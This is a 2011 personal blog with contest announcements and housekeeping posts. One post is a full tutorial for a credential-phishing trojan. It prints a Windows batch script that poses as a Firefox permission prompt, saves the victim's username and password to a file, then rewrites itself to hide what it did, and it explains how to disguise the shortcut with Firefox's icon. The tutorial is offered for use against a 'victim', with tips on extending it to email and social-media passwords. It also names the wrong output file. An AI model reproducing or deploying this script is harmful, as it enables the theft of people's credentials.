Sunday, December 11, 2011

I Need Feedback!

Please everyone,
If you think of anything you'd like changed, or like to see, please let me know. Feel free to contact me for anything else either, such as comments, constructive criticism, and of course, contest entries.
Please tell your friends about the blog, I need more members. Also, if you haven't already, please join the blog by clicking this button and following the instructions:

Have a good day!

Sunday, November 20, 2011

ASCII contest

Hey everyone!

What it is:
For this contest, I would like everyone to send me an ASCII art (AKA text art) design.
If you're not sure what this is, an example can be downloaded at the bottom of this post or on the downloads page. I would copy and paste it, but it is too large, and the formatting gets messed up.

What i want:
I will accept all entries, even if you haven't created it, but you must provide the source of where you got it if it's not yours. I will personally sort through the entries, and pick my favorite.

What you get:
If i pick your piece of ASCII art, i will do one tutorial, review, or post of your choice, within reason.

Good luck!

ASCII art example

Sunday, November 13, 2011

New Downloads Page!

Alright everyone, i've created a downloads page that will have links to all the files included in my posts and tutorials. I will also start adding links to the files needed at the bottom of my posts. If one of the links isn't working, please contact me and i will fix it immediately
Also, if you are enjoying the blog, please join.
You can do this by clicking the "Join this site" button on the sidebar to the right.
Have a good day everyone!

Tuesday, October 25, 2011

Contest Winner!

Hey everyone!
I've found a photo that i liked, and thought would be good for the blog. I've set it as the background, for everybody to see.
As for the sender, they didn't send their name with the photo, so i can't give credit to them by name, but whoever you are, thank you!
Hope you guys like it!

Thursday, October 20, 2011

My Apologies

Sorry for the wait everyone!
I had a surgery done recently so I haven't been doing much in the way of sitting at a computer. I'm still looking through the photos that were sent to me, but I promise to have the results soon!
Again, sorry for taking so long with this.

Tuesday, October 11, 2011

Background Picture Contest

Hi everyone,
this is going to be my first contest on the blog. the contest is for anyone to find a good picture (or draw one) for the background of my Blog. Please send any entries, along with your name to my email, which can be found under the Contact tab. I will review all entries and whichever picture or drawing i like best, i will make the background photo of the blog.
Good luck!

Monday, October 10, 2011

How to write a simple file for getting someones computer password

Alright, so what this file does is prompts the user for their computer username and password. Of course you'd think "Why would they give it to you anyways?". But what we're doing is making it look like it's part of the application, which in this case, is Firefox. It then saves the data, and removes itself from the computer. 
Alright, let's get started!

Note: If you would like to download the file instead of copy and pasting the code, you can download it here: MozillaFirefox.bat.
Once you have downloaded this file, skip to step 5.

Step 1:
Go to the start menu>all applications>accessories>notepad
Notepad is a simple text editor, it doesn't have any auto correct, so it's really good for scripting, but you have to make sure everything's spelled right or the code won't work.

Step 2:
Copy and paste this code into the notepad window. (I'll explain it's function in the last step.)

@echo off
color 0a
echo ==================================
echo The application "Firefox" needs
echo special permission to run the
echo startup process. We will only ask
echo you for this information once.
echo Please enter your username and 
echo password here:
echo =================================
echo =========
echo Username:
echo =========
set /p user=
echo =========
echo Password:
echo =========
set /p pass=
echo ==================
echo Thank you, Firefox
echo will start shortly
echo ==================
echo user: %user% pass: %pass% > userpass.txt
start firefox.exe
echo start firefox.exe > MozillaFirefox.bat

Step 3:
Click File>save as.
Name the file MozillaFirefox.bat
NOTE THAT THERE IS NO SPACES, this is crucial.
Make sure to click save as type all files.

Step 4:
You should end up with something like this on your desktop.

Step 5:
Go to start>My Computer now, you want to click on the icon that says Local disk (c:).
Once there, create a new folder called "secret" minus the quotes. This is where the file will be saving the username and password.

Step 6:
Drag and drop MozillaFirefox.bat from your desktop into your new folder.

Step 7: 
Right click MozillaFirefox.bat, and choose create shortcut. once you have the shortcut, drag and drop it to your desktop, and rename it Mozilla Firefox, this time with spaces.
You should end up with something like this:

Step 8:
Right click the shortcut, and click "change icon" shown here:

Step 9:
You will get prompted with a little message box telling you that there are no icons in this directory. after that, a window will pop up with a area to type in a directory path, and some icons. what you want to do, is paste this path in the area highlighted red: "C:\Program Files\Mozilla Firefox\firefox.exe" again, minus the quotes.
 After that, choose the top or bottom icon, they're both the same.

Step 10:
Leave the shortcut on the desktop, and wait for your victim to use Firefox. The Username and Password will get saved in a file called cool.txt in your secret folder. If you have experience with batch, feel free to tweak the file to get other info, such as email or social networking passwords. After you get the info, you can  leave the file on the desktop, and it will serve the same purpose as the original Firefox shortcut, it will launch Firefox. This is because i wrote the file so that as soon as it gets the info, it saves it, and also rewrites MozillaFirefox.bat so that it launches Firefox instead of asking for info again. In effect, it self destructs. The only flaw with this method of launching Firefox (although it does mean you don't have to change things on this persons computer anymore) is that a small black window flashes for a minuscule period of time before Firefox launches.

Have fun with this, also i'm not responsible for anything  you do with this file.

If you liked this tutorial, please join or Follow my blog!

Sunday, October 9, 2011

Diary of Some Nerdy Kid

Hello everyone,
welcome to the blog! On this site, you'll find lot's of interesting posts. There will be book reviews. game reviews,  DIY technology (hardware) tutorials, programming and scripting tutorials, and competitions or contests. Over time, i will develop the blog more, and add more features and things to do. I will start doing posts shortly, so sit back, wait, and enjoy!